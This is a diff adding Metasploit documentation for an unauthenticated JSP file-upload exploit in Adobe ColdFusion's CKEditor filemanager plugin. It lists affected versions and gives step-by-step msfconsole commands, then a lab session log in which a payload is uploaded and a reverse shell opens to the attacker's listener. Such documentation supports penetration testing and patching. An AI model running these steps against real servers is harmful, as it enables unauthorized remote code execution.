Add doc coldfusion_ckeditor_file_upload

documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md

@@ -0,0 +1,51 @@
+## Description
+
+A file upload vulnerability in the CKEditor of Adobe ColdFusion 11 
+(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and 
+ColdFusion 2018 (July 12 release) allows unauthenticated remote 
+attackers to upload and execute JSP files through the filemanager 
+plugin. Tested on Adobe ColdFusion 2018 v2018.0.0.310739.
+
+## Vulnerable Application
+
+ColdFusion 11 (Update 14 and earlier),
+ColdFusion 2016 (Update 6 and earlier), and 
+[ColdFusion 2018 (July 12 release)](https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0)
+
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use exploit/multi/http/coldfusion_ckeditor_file_upload`
+3. `set rhosts <rhost>`
+4. `set lhost <lhost>`
+5. `exploit`
+6. Get a shell
+
+
+## Scenarios
+
+### Tested on Coldfusion 2018 v2018.0.0.310739
+
+```
+
+msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142
+rhosts => 172.22.222.142
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136 
+lhost => 172.22.222.136
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp...
+[+] Upload succeeded! Executing payload...
+[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.142:43262) at 2019-01-10 06:30:52 -0600
+
+whoami
+cfuser
+uname -a
+Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 172.22.222.142 - Command shell session 1 closed.
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) >
+```